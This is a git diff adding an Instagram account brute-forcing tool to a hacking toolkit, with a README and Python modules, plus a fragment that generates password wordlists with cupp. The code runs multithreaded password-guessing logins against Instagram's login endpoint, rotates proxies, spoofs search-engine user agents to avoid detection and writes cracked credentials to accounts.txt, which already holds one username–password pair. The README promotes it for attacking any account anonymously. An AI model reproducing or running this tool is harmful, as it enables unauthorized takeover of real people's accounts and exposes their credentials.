'\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def wordlist(): + os.system("cd wordlists && cupp -i") + print Y+"wordlist saved to /root/htk-lite/wordlists \033[0m" + +wordlist() diff --git a/htk-lite/files/Instagram/Executable/instagram.py b/htk-lite/files/Instagram/Executable/instagram.py new file mode 100644 index 0000000..b953c68 --- /dev/null +++ b/htk-lite/files/Instagram/Executable/instagram.py @@ -0,0 +1,149 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Instagram bruter + +from sys import exit +from os.path import exists +from lib.bruter import Bruter +from lib.display import Display +from lib.const import credentials, modes + + +class Engine(object): + + def __init__(self, username, threads, passlist_path): + self.bruter = None + self.resume = False + self.is_alive = True + self.threads = threads + self.username = username + self.display = Display() + self.passlist_path = passlist_path + + def create_bruter(self): + self.bruter = Bruter(self.username, self.threads, + self.passlist_path) + + def get_user_resp(self): + return self.display.prompt('Would you like to resume the attack? [y/n]: ') + + def write_to_file(self, password): + with open(credentials, 'at') as f: + data = 'Username: {}\nPassword: {}\n\n'.format( + self.username.title(), password) + f.write(data) + + def start(self): + + self.create_bruter() + + while self.is_alive and not self.bruter.password_manager.session: + pass + + if not self.is_alive: + return + + if self.bruter.password_manager.session.exists: + try: + resp = self.get_user_resp() + except: + self.is_alive = False + + if resp and self.is_alive: + if resp.strip().lower() == 'y': + self.bruter.password_manager.resume = True + + try: + self.bruter.start() + except KeyboardInterrupt: + self.bruter.stop() + self.bruter.display.shutdown(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + finally: + self.stop() + + def stop(self): + if self.is_alive: + + self.bruter.stop() + self.is_alive = False + + if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: + self.bruter.display.stats_not_found(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + if self.bruter.is_found: + self.write_to_file(self.bruter.password) + self.bruter.display.stats_found(self.bruter.password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + +def args(): + enable_colors = str(input('Enable colors? (default: y) [y/n]: ')) + + if not enable_colors: + enable_colors = True + else: + if enable_colors[0].lower() == 'n': + enable_colors = False + + display = Display(is_color=enable_colors) + username = display.prompt('Enter a username: ') + + if not username: + display.warning('You can\'t leave this field empty') + display.wait() + exit() + + passlist = display.prompt('Enter the path to your password list: ') + + if not exists(passlist): + display.warning('Invalid path to password list', False) + display.wait() + exit() + + display.info('''Modes:\r + 0: => 512 passwords at a time + 1: => 256 passwords at a time + 2: => 128 passwords at a time + 3: => 64 passwords at a time + ''', False) + + mode = display.prompt('Select a mode [0, 1, 2, 3]: ', False) + + if not mode.isdigit(): + display.warning('Mode must be a number', False) + display.wait() + exit() + + mode = int(mode) + + if int(mode) > 3: + display.warning('Mode must be no more than 3', False) + display.wait() + exit() + + if int(mode) < 0: + display.warning('Mode must bot no less than 0', False) + display.wait() + exit() + + return [username, passlist, mode] + + +if __name__ == '__main__': + try: + user_input = args() + except KeyboardInterrupt: + exit() + + display = Display() + username, passlist, mode = user_input + + try: + Engine(username, modes[mode], passlist).start() + except: + pass + finally: + display.wait() + exit() diff --git a/htk-lite/files/Instagram/LICENSE b/htk-lite/files/Instagram/LICENSE new file mode 100644 index 0000000..f9d08a3 --- /dev/null +++ b/htk-lite/files/Instagram/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2018 Mohamed + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/htk-lite/files/Instagram/README.md b/htk-lite/files/Instagram/README.md new file mode 100644 index 0000000..51aff58 --- /dev/null +++ b/htk-lite/files/Instagram/README.md @@ -0,0 +1,124 @@ +# Instagram Bruter + +[![Version](https://img.shields.io/badge/version-v2.1.1-blue.svg)]() +[![Python](https://img.shields.io/badge/python-v3-blue.svg)]() +[![Discord](https://img.shields.io/discord/532621311017484307.svg)](https://discord.gg/jvhJMeb) +[![Donate](https://img.shields.io/badge/paypal-donate-yellow.svg)](https://www.paypal.me/Msheikh03) +
+**Bitcoin wallet:** 3Kr5C9t9HWwPfqzSNXeBNyRvJWw9sSLeKy +
+ +This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden. + +# NOTICE + +This project is no longer maintained; use version 3.0.0 at [here](https://github.com/Pure-L0G1C/Insta) + +### Requirements + +- Python _v3.x.x_ +- ~~Kali Linux 2.0~~ +- ~~TOR~~ + +### Install Dependencies + +``` +pip3 install -r requirements.txt +``` + +### Help + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h +usage: instagram.py [-h] [-m MODE] username wordlist + +positional arguments: + username email or username + wordlist password list + +optional arguments: + -h, --help show this help message and exit + -m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots +``` + +### Usage + +``` +python3 instagram.py -m +``` + +### Bots(Threads) + +- 4 bots: 64 passwords at a time +- 8 bots: 128 passwords at a time +- 16 bots: 256 passwords at a time +- 32 bots: 512 passwords at a time + +### Modes + +- 0: 32 bots +- 1: 16 bots +- 2: 8 bots +- 3: 4 bots + +### Chill mode + +This mode uses only 4 bots, or 64 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3 +``` + +### Moderate mode 1 + +This mode uses 8 bots, or 128 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2 +``` + +### Moderate mode 2 + +This mode uses 16 bots, or 256 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1 +``` + +### Savage mode + +This mode uses 32 bots, or 512 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0 +``` + +### If you don't specify a mode, then mode is set to 2 + +### Run + +``` +[-] Wordlist: pass.lst +[-] Username: Sami09.1 +[-] Password: 272 +[-] Complete: 45.51% +[-] Attempts: 228 +[-] Browsers: 273 +[-] Exists: True +``` + +### Stop + +``` +[-] Wordlist: pass.lst +[-] Username: Sami09.1 +[-] Password: Sami123 +[-] Complete: 62.67% +[-] Attempts: 314 +[-] Browsers: 185 +[-] Exists: True + +[!] Password Found +[+] Username: Sami09.1 +[+] Password: Sami123 +``` diff --git a/htk-lite/files/Instagram/accounts.txt b/htk-lite/files/Instagram/accounts.txt new file mode 100644 index 0000000..d9c4e02 --- /dev/null +++ b/htk-lite/files/Instagram/accounts.txt @@ -0,0 +1,6 @@ +Username: Tuf_Unkn0Wn +Password: 1NST4gr4mUN_KN0WNbaliP4SS + +Username: Tuf_Unkn0Wn +Password: 1NST4gr4mUN_KN0WNbaliP4SS + diff --git a/htk-lite/files/Instagram/database/session.db b/htk-lite/files/Instagram/database/session.db new file mode 100644 index 0000000..52266e3 Binary files /dev/null and b/htk-lite/files/Instagram/database/session.db differ diff --git a/htk-lite/files/Instagram/instagram.py b/htk-lite/files/Instagram/instagram.py new file mode 100644 index 0000000..2840aa8 --- /dev/null +++ b/htk-lite/files/Instagram/instagram.py @@ -0,0 +1,132 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Instagram bruter + +from sys import exit +from os.path import exists +from lib.bruter import Bruter +from lib.display import Display +from platform import python_version +from lib.const import credentials, modes +from argparse import ArgumentParser, ArgumentTypeError + + +class Engine(object): + + def __init__(self, username, threads, passlist_path, is_color): + self.bruter = None + self.resume = False + self.is_alive = True + self.threads = threads + self.username = username + self.passlist_path = passlist_path + self.display = Display(is_color=is_color) + + def passlist_path_exists(self): + if not exists(self.passlist_path): + self.display.warning('Invalid path to password list') + return False + return True + + def create_bruter(self): + self.bruter = Bruter( + self.username, + self.threads, + self.passlist_path + ) + + def get_user_resp(self): + return self.display.prompt('Would you like to resume the attack? [y/n]: ') + + def write_to_file(self, password): + with open(credentials, 'at') as f: + data = 'Username: {}\nPassword: {}\n\n'.format( + self.username.title(), password) + f.write(data) + + def start(self): + if not self.passlist_path_exists(): + self.is_alive = False + + if self.is_alive: + self.create_bruter() + + while self.is_alive and not self.bruter.password_manager.session: + pass + + if not self.is_alive: + return + + if self.bruter.password_manager.session.exists: + try: + resp = self.get_user_resp() + except: + self.is_alive = False + + if resp and self.is_alive: + if resp.strip().lower() == 'y': + self.bruter.password_manager.resume = True + + try: + self.bruter.start() + except KeyboardInterrupt: + self.bruter.stop() + self.bruter.display.shutdown(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + finally: + self.stop() + + def stop(self): + if self.is_alive: + + self.bruter.stop() + self.is_alive = False + + if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: + self.bruter.display.stats_not_found(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + if self.bruter.is_found: + self.write_to_file(self.bruter.password) + self.bruter.display.stats_found(self.bruter.password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + +def valid_int(n): + if not n.isdigit(): + raise ArgumentTypeError('mode must be a number') + + n = int(n) + + if n > 3: + raise ArgumentTypeError('maximum for a mode is 3') + + if n < 0: + raise ArgumentTypeError('minimum for a mode is 0') + + return n + + +def args(): + args = ArgumentParser() + args.add_argument('username', help='email or username') + args.add_argument('passlist', help='password list') + args.add_argument('-nc', '--no-color', dest='color', + action='store_true', help='disable colors') + args.add_argument('-m', '--mode', default=2, type=valid_int, + help='modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots') + return args.parse_args() + + +if __name__ == '__main__': + + if int(python_version()[0]) < 3: + print('[!] Please use Python 3') + exit() + + arugments = args() + mode = arugments.mode + username = arugments.username + passlist = arugments.passlist + is_color = True if not arugments.color else False + Engine(username, modes[mode], passlist, is_color).start() diff --git a/htk-lite/files/Instagram/lib/__init__.py b/htk-lite/files/Instagram/lib/__init__.py new file mode 100644 index 0000000..c30328c --- /dev/null +++ b/htk-lite/files/Instagram/lib/__init__.py @@ -0,0 +1,2 @@ +# Date: 12/30/2018 +# Author: Mohamed diff --git a/htk-lite/files/Instagram/lib/__pycache__/__init__.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/__init__.cpython-37.pyc new file mode 100644 index 0000000..4ca85bf Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/__init__.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/bad_proxies.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/bad_proxies.cpython-37.pyc new file mode 100644 index 0000000..0f8dbb8 Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/bad_proxies.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/browser.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/browser.cpython-37.pyc new file mode 100644 index 0000000..dc0aa2d Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/browser.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/bruter.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/bruter.cpython-37.pyc new file mode 100644 index 0000000..0ad6f39 Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/bruter.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/const.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/const.cpython-37.pyc new file mode 100644 index 0000000..2228a00 Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/const.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/display.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/display.cpython-37.pyc new file mode 100644 index 0000000..4091f49 Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/display.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/password_manager.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/password_manager.cpython-37.pyc new file mode 100644 index 0000000..d90e893 Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/password_manager.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/proxy.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/proxy.cpython-37.pyc new file mode 100644 index 0000000..b9ff6ce Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/proxy.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/proxy_list.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/proxy_list.cpython-37.pyc new file mode 100644 index 0000000..5e5bf03 Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/proxy_list.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/proxy_manager.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/proxy_manager.cpython-37.pyc new file mode 100644 index 0000000..1d279ac Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/proxy_manager.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/scraper.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/scraper.cpython-37.pyc new file mode 100644 index 0000000..ec0feec Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/scraper.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/__pycache__/session.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/session.cpython-37.pyc new file mode 100644 index 0000000..f46f8d9 Binary files /dev/null and b/htk-lite/files/Instagram/lib/__pycache__/session.cpython-37.pyc differ diff --git a/htk-lite/files/Instagram/lib/bad_proxies.py b/htk-lite/files/Instagram/lib/bad_proxies.py new file mode 100644 index 0000000..d27bcbe --- /dev/null +++ b/htk-lite/files/Instagram/lib/bad_proxies.py @@ -0,0 +1,24 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Manages bad proxies + +from .const import max_bad_proxies + + +class BadProxies(object): + + def __init__(self): + self.proxies = [] + + def __contains__(self, proxy): + for _proxy in self.proxies: + if _proxy.ip == proxy.ip and _proxy.port == proxy.port: + return True + return False + + def append(self, proxy): + if len(self.proxies) >= max_bad_proxies: + self.proxies.pop(0) + + self.proxies.append(proxy) + diff --git a/htk-lite/files/Instagram/lib/browser.py b/htk-lite/files/Instagram/lib/browser.py new file mode 100644 index 0000000..d3aefea --- /dev/null +++ b/htk-lite/files/Instagram/lib/browser.py @@ -0,0 +1,127 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Browser + +from time import time +from random import choice +from requests import Session +from .const import browser_data, response_codes, fetch_time, user_agents, debug + + +class Browser(object): + + account_exists = None + + def __init__(self, username, password, proxy): + self.proxy = proxy + self.is_found = False + self.is_active = True + self.is_locked = False + self.start_time = None + self.browser = self.br() + self.username = username + self.password = password + self.is_attempted = False + + def br(self): + header = browser_data['header'] + header['user-agent'] = choice(user_agents) + + session = Session() + session.headers.update(header) + session.proxies.update(self.proxy.addr) + return session + + def get_token(self): + token = None + try: + token = self.browser.get( + browser_data['home_url'], timeout=fetch_time).cookies.get_dict()['csrftoken'] + + self.browser.headers.update({ + 'cookie': 'mid=XLzTtAALAAEb-Sz-JUGbyLphzGmc; csrftoken={}; rur={}'.format( + token, self.browser.cookies.get_dict()['rur'] + ) + }) + except: + pass + finally: + return token + + def post_data(self): + response = None + data = {browser_data['username_field']: self.username, + browser_data['password_field']: self.password} + + try: + response = self.browser.post( + browser_data['login_url'], data=data, timeout=fetch_time).json() + except: + pass + finally: + return response + + def check_exists(self, response): + if 'user' in response: + Browser.account_exists = response['user'] + + def check_response(self, response): + if 'authenticated' in response: + if response['authenticated']: + return response_codes['succeed'] + + if 'message' in response: + if response['message'] == 'checkpoint_required': + return response_codes['succeed'] + + if response['status'] == 'fail': + return response_codes['locked'] + + if 'errors' in response: + return response_codes['locked'] + + return response_codes['failed'] + + def authenicate(self): + response = self.post_data() + resp = {'attempted': False, 'accessed': False, 'locked': False} + + if debug: + print('pass: {} => {}'.format(self.password, response)) + + if response: + resp['attempted'] = True + resp_code = self.check_response(response) + + if resp_code == response_codes['locked']: + resp['locked'] = True + + if resp_code == response_codes['succeed']: + resp['accessed'] = True + + if Browser.account_exists == None: + self.check_exists(response) + + return resp + + def attempt(self): + self.start_time = time() + token = self.get_token() + + if token: + self.browser.headers.update({'x-csrftoken': token}) + resp = self.authenicate() + + if resp['attempted']: + self.is_attempted = True + + if not resp['locked']: + if resp['accessed']: + self.is_found = True + else: + self.is_locked = True + self.close() + + def close(self): + self.browser.close() + self.is_active = False diff --git a/htk-lite/files/Instagram/lib/bruter.py b/htk-lite/files/Instagram/lib/bruter.py new file mode 100644 index 0000000..f21269b --- /dev/null +++ b/htk-lite/files/Instagram/lib/bruter.py @@ -0,0 +1,176 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Bruter + +from time import time, sleep +from lib.browser import Browser +from lib.display import Display +from threading import Thread, RLock +from lib.proxy_manager import ProxyManager +from lib.password_manager import PasswordManager +from lib.const import max_time_to_wait, max_bots_per_proxy + + +class Bruter(object): + + def __init__(self, username, threads, passlist_path): + self.browsers = [] + self.lock = RLock() + self.password = None + self.is_alive = True + self.is_found = False + self.bots_per_proxy = 0 + self.username = username + self.last_password = None + self.active_passwords = [] + self.proxy_manager = ProxyManager() + self.display = Display(username, passlist_path) + self.password_manager = PasswordManager(username, + passlist_path, threads, self.display) + + def manage_session(self): + if self.password_manager.is_read: + if not self.password_manager.list_size or self.is_found: + self.password_manager.session.delete() + else: + if self.is_found: + self.password_manager.session.delete() + else: + self.password_manager.session.write(self.password_manager.attempts, + self.password_manager.passlist) + + def browser_manager(self): + while self.is_alive: + + for browser in self.browsers: + + if not self.is_alive: + break + + if Display.account_exists == None and Browser.account_exists != None: + Display.account_exists = Browser.account_exists + + if not browser.is_active: + + password = browser.password + + if browser.is_attempted and not browser.is_locked: + + if browser.is_found and not self.is_found: + self.password = password + self.is_found = True + + with self.lock: + self.password_manager.list_remove(password) + else: + with self.lock: + self.proxy_manager.bad_proxy(browser.proxy) + + self.remove_browser(browser) + + else: + if browser.start_time: + if time() - browser.start_time >= max_time_to_wait: + browser.close() + + def remove_browser(self, browser): + if browser in self.browsers: + with self.lock: + self.browsers.pop(self.browsers.index(browser)) + self.active_passwords.pop( + self.active_passwords.index(browser.password) + ) + + def attack(self): + proxy = None + is_attack_started = False + while self.is_alive: + + browsers = [] + for password in self.password_manager.passlist: + + if not self.is_alive: + break + + if not proxy: + proxy = self.proxy_manager.get_proxy() + self.bots_per_proxy = 0 + + if self.bots_per_proxy >= max_bots_per_proxy: + proxy = None + + if not proxy: + continue + + if not password in self.active_passwords and password in self.password_manager.passlist: + browser = Browser(self.username, password, proxy) + browsers.append(browser) + self.bots_per_proxy += 1 + + if not is_attack_started: + self.display.info('Starting attack ...') + is_attack_started = True + + with self.lock: + self.browsers.append(browser) + self.active_passwords.append(password) + + for browser in browsers: + thread = Thread(target=browser.attempt) + thread.daemon = True + try: + thread.start() + except: + self.remove_browser(browser) + + def start_daemon_threads(self): + attack = Thread(target=self.attack) + browser_manager = Thread(target=self.browser_manager) + proxy_manager = Thread(target=self.proxy_manager.start) + password_manager = Thread(target=self.password_manager.start) + + attack.daemon = True + proxy_manager.daemon = True + browser_manager.daemon = True + password_manager.daemon = True + + attack.start() + proxy_manager.start() + browser_manager.start() + password_manager.start() + + self.display.info('Searching for proxies ...') + + def stop_daemon_threads(self): + self.proxy_manager.stop() + self.password_manager.stop() + + def start(self): + self.display.info('Initiating daemon threads ...') + self.start_daemon_threads() + + last_attempt = 0 + while self.is_alive and not self.is_found: + + if last_attempt == self.password_manager.attempts and self.password_manager.attempts: + sleep(1.5) + continue + + for browser in self.browsers: + + self.display.stats( + browser.password, self.password_manager.attempts, len(self.browsers)) + last_attempt = self.password_manager.attempts + self.last_password = browser.password + + if not self.is_alive or self.is_found: + break + + if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers): + self.is_alive = False + + def stop(self): + self.is_alive = False + self.manage_session() + self.stop_daemon_threads() + self.password_manager.session.is_busy = False diff --git a/htk-lite/files/Instagram/lib/const.py b/htk-lite/files/Instagram/lib/const.py new file mode 100644 index 0000000..a2cfc84 --- /dev/null +++ b/htk-lite/files/Instagram/lib/const.py @@ -0,0 +1,76 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Constants + +import os + +# User agents +user_agents = [ + 'Googlebot/2.1 (+http://www.google.com/bot.html)', + 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + + + 'Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (seoanalyzer; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) SitemapProbe', + 'Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530) like Gecko (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', +] + +# Browser +header = { + 'x-ig-app-id': '936619743392459', + 'x-instagram-ajax': '2f6bf8b37c04', + 'x-requested-with': 'XMLHttpRequest', + 'referer': 'https://www.instagram.com/', + 'content-type': 'application/x-www-form-urlencoded' +} + +username_field = 'username' +password_field = 'password' +home_url = 'https://www.instagram.com/' +login_url = 'https://www.instagram.com/accounts/login/ajax/' + +browser_data = { + 'header': header, + 'home_url': home_url, + 'login_url': login_url, + 'username_field': username_field, + 'password_field': password_field +} + +# Login +fetch_time = (10, 15) +response_codes = {'succeed': 0, 'failed': 1, 'locked': -1} + +# Limits +max_bad_proxies = 128 +max_time_to_wait = 18 +max_bots_per_proxy = 16 + +# Misc +debug = False +credentials = 'accounts.txt' +modes = {0: 512, 1: 256, 2: 128, 3: 64} + +# Database +db_dir = 'database' +db_session = 'session.db' +db_path = os.path.join(db_dir, db_session) + +if not os.path.exists(db_dir): + os.mkdir(db_dir) diff --git a/htk-lite/files/Instagram/lib/display.py b/htk-lite/files/Instagram/lib/display.py new file mode 100644 index 0000000..5f1a1a9 --- /dev/null +++ b/htk-lite/files/Instagram/lib/display.py @@ -0,0 +1,160 @@ +# 12/29/2018 +# Author: Mohamed +# Description: Display + +from os import system +from time import sleep +from .const import debug +from colorama import Fore +from builtins import input +from platform import system as platform + + +class Display(object): + + __is_color = None + total_lines = None + account_exists = None + + def __init__(self, username=None, passlist=None, is_color=None): + self.delay = 1.3 + self.username = username + self.passlist = passlist + self.colors_disabled = True + self.cls = 'cls' if platform() == 'Windows' else 'clear' + + if Display.__is_color == None: + Display.__is_color = is_color + + def clear(self): + if not debug or self.colors_disabled: + system(self.cls) + + if self.colors_disabled and self.__is_color: + self.colors_disabled = False + else: + print('\n\n') + + def stats(self, password, attempts, browsers, load=True): + self.clear() + complete = round((attempts/Display.total_lines) * 100, 4) + account_exists = self.account_exists if self.account_exists != None else '' + + if self.__is_color: + print('{0}[{1}-{0}] {1}Wordlist: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.passlist, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Username: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.username.title(), Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Password: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, password, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Complete: {2}{3}%{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, complete, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Attempts: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, attempts, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Browsers: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, browsers, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Exists: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, account_exists, Fore.RESET + )) + + else: + print( + f'[-] Wordlist: {self.passlist}\n[-] Username: {self.username}\n[-] Password: {password}') + + print( + f'Complete: {complete}\n[-] Attempts: {attempts}\n[-] Browsers: {browsers}\n[-] Exists: {account_exists}') + + if load: + sleep(self.delay) + + def stats_found(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Password Found{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + + print('{0}[{1}+{0}] {2}Username: {1}{3}{4}'.format( + Fore.YELLOW, Fore.GREEN, Fore.WHITE, self.username.title(), Fore.RESET + )) + + print('{0}[{1}+{0}] {2}Password: {1}{3}{4}'.format( + Fore.YELLOW, Fore.GREEN, Fore.WHITE, password, Fore.RESET + )) + else: + print('\n[!] Password Found\n[+] Username: {}\n[+] Password: {}'.format( + self.username.title(), password + )) + + sleep(self.delay) + + def stats_not_found(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Password Not Found{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + else: + print('\n[!] Password Not Found') + + sleep(self.delay) + + def shutdown(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Shutting Down ...{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + else: + print('\n[!] Shutting Down ...') + + sleep(self.delay) + + def 